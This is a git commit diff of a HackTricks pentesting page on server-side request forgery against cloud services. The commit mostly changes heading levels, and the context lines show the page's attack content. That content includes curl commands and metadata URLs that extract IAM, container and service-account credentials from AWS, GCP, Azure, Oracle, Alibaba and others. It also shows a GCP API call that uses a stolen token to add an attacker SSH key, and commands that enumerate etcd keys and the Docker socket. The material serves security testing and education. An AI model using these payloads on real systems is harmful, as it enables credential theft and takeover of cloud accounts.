coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [#3174] No subject

Browse Source
This commit is contained in:
CPol 2022-05-02 18:53:13 +00:00 committed by gitbook-bot
parent 453d24f044
commit ff681fc8fc
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 21 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
View File

@ -1,4 +1,4 @@
# Cloud SSRF
<details>
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## AWS
# AWS
### Abusing SSRF in AWS EC2 environment
## Abusing SSRF in AWS EC2 environment
### 169.254.169.254 - Metadata Address
#### 169.254.169.254 - Metadata Address
**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
@ -74,7 +73,7 @@ Another possible interesting place where you can find credentials is in[ http://
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
## SSRF in AWS ECS (Container Service) credentials
### SSRF in AWS ECS (Container Service) credentials
**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
@ -86,7 +85,7 @@ You could be able to read it exploiting an **Path Traversal** to _file:///proc/s
curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
```
## SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
We retrieve the `accountId` and `region` from the API.
@ -105,9 +104,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
# GCP <a href="#6440" id="6440"></a>
## GCP <a href="#6440" id="6440"></a>
## SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
@ -193,7 +194,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
## Add an SSH key <a href="#3e24" id="3e24"></a>
### Add an SSH key <a href="#3e24" id="3e24"></a>
Extract the token
@ -222,7 +223,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```
# Digital Ocean <a href="#9f1f" id="9f1f"></a>
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
@ -238,11 +239,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
curl http://169.254.169.254/metadata/v1.json | jq
```
# Packetcloud <a href="#2af0" id="2af0"></a>
## Packetcloud <a href="#2af0" id="2af0"></a>
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
# Azure <a href="#cea8" id="cea8"></a>
## Azure <a href="#cea8" id="cea8"></a>
Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
@ -255,7 +256,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
```
# OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
(header required? unknown)
@ -263,7 +264,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu
http://169.254.169.254/openstack
```
# HP Helion <a href="#a8e0" id="a8e0"></a>
## HP Helion <a href="#a8e0" id="a8e0"></a>
(header required? unknown)
@ -271,7 +272,7 @@ http://169.254.169.254/openstack
http://169.254.169.254/2009-04-04/meta-data/
```
# Oracle Cloud <a href="#a723" id="a723"></a>
## Oracle Cloud <a href="#a723" id="a723"></a>
```
http://192.0.0.192/latest/
@ -280,7 +281,7 @@ http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
# Alibaba <a href="#51bd" id="51bd"></a>
## Alibaba <a href="#51bd" id="51bd"></a>
```
http://100.100.100.200/latest/meta-data/
@ -288,7 +289,7 @@ http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
# Kubernetes ETCD <a href="#c80a" id="c80a"></a>
## Kubernetes ETCD <a href="#c80a" id="c80a"></a>
Can contain API keys and internal ip and ports
@ -297,7 +298,7 @@ curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
# Docker <a href="#ac0b" id="ac0b"></a>
## Docker <a href="#ac0b" id="ac0b"></a>
```
http://127.0.0.1:2375/v1.24/containers/jsonSimple example
@ -306,13 +307,12 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
# Rancher <a href="#8cb7" id="8cb7"></a>
## Rancher <a href="#8cb7" id="8cb7"></a>
```
curl http://rancher-metadata/<version>/<path>
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -328,5 +328,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>